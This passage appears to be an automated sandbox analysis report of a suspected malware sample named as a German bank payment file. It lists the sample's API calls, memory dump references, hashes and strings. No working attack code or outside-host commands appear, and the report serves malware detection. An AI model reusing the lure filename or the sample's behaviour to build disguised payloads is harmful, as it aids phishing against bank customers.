                                                                                                                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                                          Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000001,00404054), ref: 00404237
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                                                                                                                          • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                                                                                                                                                                          Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                          • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                                                                                                                                                                          • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,00001CA4), ref: 10001C24
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                                                                                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                                                                                                                          Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
                                                                                                                                                                                                                                            • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                                                                                                                                                                                                            • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F2A
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,?,007A5DC0,?), ref: 00405F65
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405F74
                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406013
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040601A
                                                                                                                                                                                                                                            • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
                                                                                                                                                                                                                                            • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                          • Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                                                                                                                                                                                                          • Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
                                                                                                                                                                                                                                          Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00406556
                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 00406565
                                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 0040656A
                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 0040657D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406545
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
                                                                                                                                                                                                                                          • "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 004064F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                          • API String ID: 589700163-3387442124
                                                                                                                                                                                                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                                                                                                                                                                                                          Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404278
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00404294
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042A0
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004042AC
                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004042BF
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004042CF
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004042E9
                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004042F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                                                                                                                          • Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
                                                                                                                                                                                                                                          Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(000CACE6,?,000CACEA), ref: 00402E20
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E30
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402E2A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                          • Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                                                                                                                                                                                                          • Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
                                                                                                                                                                                                                                          Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                                                                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
